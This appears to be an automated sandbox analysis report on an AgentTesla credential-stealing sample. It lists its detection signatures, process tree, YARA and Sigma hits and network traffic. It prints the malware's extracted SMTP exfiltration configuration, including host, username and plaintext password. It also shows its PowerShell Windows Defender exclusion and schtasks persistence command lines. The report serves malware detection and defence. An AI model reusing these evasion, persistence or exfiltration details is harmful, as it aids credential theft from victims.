
Windows Analysis Report
SMBKT-20242005.exe

Overview

General Information

Sample name: SMBKT-20242005.exe
Analysis ID: 1444949
MD5: 52cd4c12a51d55526ceaa5f1e7f9e549
SHA1: 6ca86a42d595177b554b82b5ea3a8dd40d1c3280
SHA256: c501ebcf488c9172ef490e70c37adb5926783f3aac132e8ff58f90b6b3232e03
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SMBKT-20242005.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\SMBKT-20242005.exe" MD5: 52CD4C12A51D55526CEAA5F1E7F9E549)
    • powershell.exe (PID: 7600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7616 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7764 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • joUXSCpr.exe (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\joUXSCpr.exe MD5: 52CD4C12A51D55526CEAA5F1E7F9E549)
    • schtasks.exe (PID: 8016 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8076 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.stilbo.eu", "Username": "stilbogdan@stilbo.eu", "Password": "StilBO_#1"}
Yara matches in memory dumps (Source, Rule, Description, Author, Strings):
Source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000000F.00000002.2663210822.000000000310F000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

Yara matches in unpacked PEs (Source, Rule, Description, Author, Strings):
Source: 8.2.RegSvcs.exe.400000.0.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 8.2.RegSvcs.exe.400000.0.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 8.2.RegSvcs.exe.400000.0.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen, Strings:
  • 0x33701:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x33773:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x337fd:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3388f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x338f9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3396b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x33a01:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x33a91:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SMBKT-20242005.exe", ParentImage: C:\Users\user\Desktop\SMBKT-20242005.exe, ParentProcessId: 7376, ParentProcessName: SMBKT-20242005.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", ProcessId: 7600, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\joUXSCpr.exe, ParentImage: C:\Users\user\AppData\Roaming\joUXSCpr.exe, ParentProcessId: 7852, ParentProcessName: joUXSCpr.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp", ProcessId: 8016, ProcessName: schtasks.exe
Source: Network Connection, Author: frack113, Data: DestinationIp: 212.44.102.65, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7764, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49712
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SMBKT-20242005.exe", ParentImage: C:\Users\user\Desktop\SMBKT-20242005.exe, ParentProcessId: 7376, ParentProcessName: SMBKT-20242005.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", ProcessId: 7616, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SMBKT-20242005.exe", ParentImage: C:\Users\user\Desktop\SMBKT-20242005.exe, ParentProcessId: 7376, ParentProcessName: SMBKT-20242005.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", ProcessId: 7600, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SMBKT-20242005.exe", ParentImage: C:\Users\user\Desktop\SMBKT-20242005.exe, ParentProcessId: 7376, ParentProcessName: SMBKT-20242005.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", ProcessId: 7616, ProcessName: schtasks.exe
No Snort rule has matched


AV Detection

Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.stilbo.eu", "Username": "stilbogdan@stilbo.eu", "Password": "StilBO_#1"}
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe, ReversingLabs: Detection: 36%
Source: SMBKT-20242005.exe, ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe, Joe Sandbox ML: detected
Source: SMBKT-20242005.exe, Joe Sandbox ML: detected
Source: SMBKT-20242005.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: SMBKT-20242005.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SMBKT-20242005.exe, Code function: 4x nop then jmp 04DF60D5h 1_2_04DF6599
Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe, Code function: 4x nop then jmp 04CB5365h 9_2_04CB5829
Source: global traffic, TCP traffic: 192.168.2.9:49712 -> 212.44.102.65:587
Source: Joe Sandbox View, IP Address: 104.26.13.205
Source: Joe Sandbox View, ASN Name: DHH-ASSI
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: mail.stilbo.eu
Source: SMBKT-20242005.exe, joUXSCpr.exe.1.dr, String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: SMBKT-20242005.exe, joUXSCpr.exe.1.dr, String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RegSvcs.exe, 00000008.00000002.1477888050.0000000006510000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.mS
Source: RegSvcs.exe, 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://mail.stilbo.eu
Source: SMBKT-20242005.exe, joUXSCpr.exe.1.dr, String found in binary or memory: http://ocsp.comodoca.com0
Source: RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://r3.i.lencr.org/0
Source: RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://r3.o.lencr.org0
Source: SMBKT-20242005.exe, 00000001.00000002.1461356615.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, joUXSCpr.exe, 00000009.00000002.1492085386.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://x1.c.lencr.org/0
Source: RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://x1.i.lencr.org/0
Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://account.dyn.com/
Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org/t
Source: SMBKT-20242005.exe, joUXSCpr.exe.1.dr, String found in binary or memory: https://t3.ftcdn.net/jpg/02/48/42/64/360_F_248426448_NVKLywWqArG2ADUxDq6QprtIzsF82dMF.jpgG
Source: SMBKT-20242005.exe, joUXSCpr.exe.1.dr, String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknown, Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown, Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49713

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, gmBpn1ecBmQ.cs, .Net Code: bBjS

System Summary

Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: SMBKT-20242005.exe, Marca.cs, Large array initialization: array initializer size 683637
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA9E519_2_04CA9E51
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA9E609_2_04CA9E60
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB73709_2_04CB7370
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB04789_2_04CB0478
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB96E09_2_04CB96E0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB26289_2_04CB2628
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB00409_2_04CB0040
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_051E8A609_2_051E8A60
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_051E00069_2_051E0006
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_051E00409_2_051E0040
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053925589_2_05392558
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053997B09_2_053997B0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_05399FD89_2_05399FD8
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DEA09_2_0539DEA0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539A9399_2_0539A939
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539B8409_2_0539B840
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053925489_2_05392548
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539A46C9_2_0539A46C
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_05398C489_2_05398C48
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539D4E99_2_0539D4E9
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DCD09_2_0539DCD0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DCCD9_2_0539DCCD
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053997219_2_05399721
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539F7689_2_0539F768
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539B7AD9_2_0539B7AD
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539C6709_2_0539C670
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053996B09_2_053996B0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539C6809_2_0539C680
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539D8799_2_0539D879
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539D8889_2_0539D888
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DA709_2_0539DA70
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DA619_2_0539DA61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0300A28815_2_0300A288
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0300E6B815_2_0300E6B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0300AA5015_2_0300AA50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_03004AB815_2_03004AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_03003EA015_2_03003EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_030041E815_2_030041E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0565015_2_06B05650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0665815_2_06B06658
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0242815_2_06B02428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B07DE015_2_06B07DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0B2A015_2_06B0B2A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0C1F015_2_06B0C1F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0770015_2_06B07700
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0E41015_2_06B0E410
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B05D6015_2_06B05D60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0004015_2_06B00040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0000615_2_06B00006
Source: SMBKT-20242005.exe | Static PE information: invalid certificate
Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SMBKT-20242005.exe
Source: SMBKT-20242005.exe, 00000001.00000002.1465713140.00000000076C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SMBKT-20242005.exe
Source: SMBKT-20242005.exe, 00000001.00000002.1461356615.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename459505ed-14a8-4c14-90e3-7a9b2c02174b.exe4 vs SMBKT-20242005.exe
Source: SMBKT-20242005.exe, 00000001.00000002.1460354065.000000000104E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SMBKT-20242005.exe
Source: SMBKT-20242005.exe, 00000001.00000002.1465224388.00000000073CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs SMBKT-20242005.exe
Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs SMBKT-20242005.exe
Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename459505ed-14a8-4c14-90e3-7a9b2c02174b.exe4 vs SMBKT-20242005.exe
Source: SMBKT-20242005.exe, 00000001.00000002.1465010804.0000000007260000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs SMBKT-20242005.exe
Source: SMBKT-20242005.exe | Binary or memory string: OriginalFilenameoaJU.exe( vs SMBKT-20242005.exe
Source: SMBKT-20242005.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
